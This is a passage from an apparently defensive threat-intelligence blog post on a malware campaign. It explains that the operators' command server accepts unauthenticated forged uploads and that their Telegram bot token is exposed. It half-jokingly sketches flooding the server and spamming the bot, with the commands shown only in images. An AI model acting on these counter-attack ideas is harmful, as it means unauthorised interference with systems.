y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Chrome Remote Control Dashboard exposed</figcaption></figure></div><p>Their C2 server is a <strong><a href="https://pkg.go.dev/net/http">Go net/http server</a></strong>, which aligns with the <strong>User-Agent</strong> observed in the requests (<em>Go-http-client</em>) and the language used across all binaries.</p><p>A bad actor could <strong><a href="https://en.wikipedia.org/wiki/Reverse_engineering">reverse-engineer</a> the logic behind the C2 server</strong>, or <strong>brute-force</strong> <strong>access</strong> to RDP or the Chrome Remote Desktop panel&#8230; but those are nerd moves. If you want <strong>to beat the malware</strong>, you have to think like the malware, act like the malware, or&#8230; well, <em>become the malware</em>.</p><p>After careful observation, we noticed that the <em>/info</em> endpoint queried by the malware<strong> does not require any form of authentication</strong> and <strong>allows <a href="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload">arbitrary file uploads</a></strong><a href="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload">,</a> as long as the expected <strong>User-Agent and file format are respected&#8230;</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CNwV!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CNwV!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png 424w, https://substackcdn.com/image/fetch/$s_!CNwV!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png 848w, https://substackcdn.com/image/fetch/$s_!CNwV!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png 1272w, https://substackcdn.com/image/fetch/$s_!CNwV!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CNwV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png" width="500" height="372.11981566820276" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ae1fc818-9ccd-45dd-ae09-3b9f1bdec66c_868x646.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:646,&quot;width&quot;:868,&quot;resizeWidth&quot;:500,&quot;bytes&quot;:146463,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fae1fc818-9ccd-45dd-ae09-3b9f1bdec66c_868x646.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CNwV!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png 424w, https://substackcdn.com/image/fetch/$s_!CNwV!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png 848w, https://substackcdn.com/image/fetch/$s_!CNwV!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png 1272w, https://substackcdn.com/image/fetch/$s_!CNwV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd4d27f6d-4cbe-42d2-85d9-2657ddd7a577_868x646.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Network dialogue analysis via ANYRUN</figcaption></figure></div><p>This could allow <strong>virtually anyone</strong> to <strong>impersonate the malware and</strong> <strong>flood their infrastructure</strong> with mass-produced files <strong>until their services become unusable</strong>, due to file <strong>pollution</strong>, server <strong>saturation</strong>, or account <strong>suspension</strong>, whichever comes first.</p><p>If that <em>virtually anyone</em> were to do so, they would only need to <strong>loop the same forged request</strong> <strong>over and over</strong>, in an effort that could be implemented in <a href="https://www.w3schools.com/bash/bash_loops.php">no more than five or six lines of code</a>. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!rUWz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!rUWz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png 424w, https://substackcdn.com/image/fetch/$s_!rUWz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png 848w, https://substackcdn.com/image/fetch/$s_!rUWz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png 1272w, https://substackcdn.com/image/fetch/$s_!rUWz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!rUWz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png" width="1389" height="574" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a7a84cac-1d1a-45c5-b363-7f1bec926328_1389x574.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:574,&quot;width&quot;:1389,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:173430,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a84cac-1d1a-45c5-b363-7f1bec926328_1389x574.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!rUWz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png 424w, https://substackcdn.com/image/fetch/$s_!rUWz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png 848w, https://substackcdn.com/image/fetch/$s_!rUWz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png 1272w, https://substackcdn.com/image/fetch/$s_!rUWz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ff1f514-bbfc-42f1-9baa-a9a117b7c33d_1389x574.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Something like this (Artist&#8217;s impression)</figcaption></figure></div><p>But that&#8217;s not all. Remember the <strong>Telegram-based exfiltration</strong> method? </p><p>How &#8220;<em>insecure</em>&#8221; is it, really?</p><p>Well, if we analyse the exfiltration attempt, we find that the operators <strong>left their Telegram Bot API token exposed</strong>. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kO-H!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kO-H!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png 424w, https://substackcdn.com/image/fetch/$s_!kO-H!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png 848w, https://substackcdn.com/image/fetch/$s_!kO-H!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png 1272w, https://substackcdn.com/image/fetch/$s_!kO-H!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kO-H!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png" width="3356" height="2078" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5a644a6a-b65b-4919-8de3-26f05d5744dd_3356x2078.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:2078,&quot;width&quot;:3356,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1479485,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F770128a0-0214-4c5f-9e34-bcc90a970233_3356x2078.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kO-H!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png 424w, https://substackcdn.com/image/fetch/$s_!kO-H!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png 848w, https://substackcdn.com/image/fetch/$s_!kO-H!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png 1272w, https://substackcdn.com/image/fetch/$s_!kO-H!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F33f7e478-b9de-40cc-b41d-63b56afb5850_3356x2078.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Network dialogue analysis via ANYRUN</figcaption></figure></div><p>This is an <strong>administration key</strong> that allows <strong>anyone</strong> to <strong>read incoming messages</strong>, <strong>send messages</strong> on the bot&#8217;s behalf, and interfere with its operation, potentially <strong>leading to its disruption or takedown</strong>, with just a few commands like the ones depicted below.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!s371!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!s371!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png 424w, https://substackcdn.com/image/fetch/$s_!s371!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png 848w, https://substackcdn.com/image/fetch/$s_!s371!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png 1272w, https://substackcdn.com/image/fetch/$s_!s371!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!s371!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png" width="1326" height="574" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eb649471-4819-4a27-8f67-b169a7f70cc7_1326x574.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:574,&quot;width&quot;:1326,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:236427,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db4cd3f-b803-47c2-a921-39c39737e640_1326x574.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!s371!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png 424w, https://substackcdn.com/image/fetch/$s_!s371!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png 848w, https://substackcdn.com/image/fetch/$s_!s371!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png 1272w, https://substackcdn.com/image/fetch/$s_!s371!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9a47134-6382-496b-9ed8-867ceaab13fe_1326x574.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Artist&#8217;s impression, no Chollimas were cyber-bullied</figcaption></figure></div><p>This would ultimately allow <strong>anyone</strong> to interact with the bot and start sending messages, effectively <strong>spamming both incoming and outgoing channels</strong> posing as the bot itself.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LrYn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LrYn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png 424w, https://substackcdn.com/image/fetch/$s_!LrYn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png 848w, https://substackcdn.com/image/fetch/$s_!LrYn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png 1272w, https://substackcdn.com/image/fetch/$s_!LrYn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LrYn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png" width="425" height="479.3015332197615" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7b9b25c9-85bf-4592-a134-e2466858f603_587x662.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:662,&quot;width&quot;:587,&quot;resizeWidth&quot;:425,&quot;bytes&quot;:120270,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:&quot;&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b9b25c9-85bf-4592-a134-e2466858f603_587x662.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!LrYn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png 424w, https://substackcdn.com/image/fetch/$s_!LrYn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png 848w, https://substackcdn.com/image/fetch/$s_!LrYn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png 1272w, https://substackcdn.com/image/fetch/$s_!LrYn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d66b8-986a-4797-aaa5-2efdff55ee62_587x662.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Eventually, the threat actor will have to <strong>take action</strong> (like <strong>stopping </strong>or<strong> blocking </strong>the bot), or be buried under thousands of 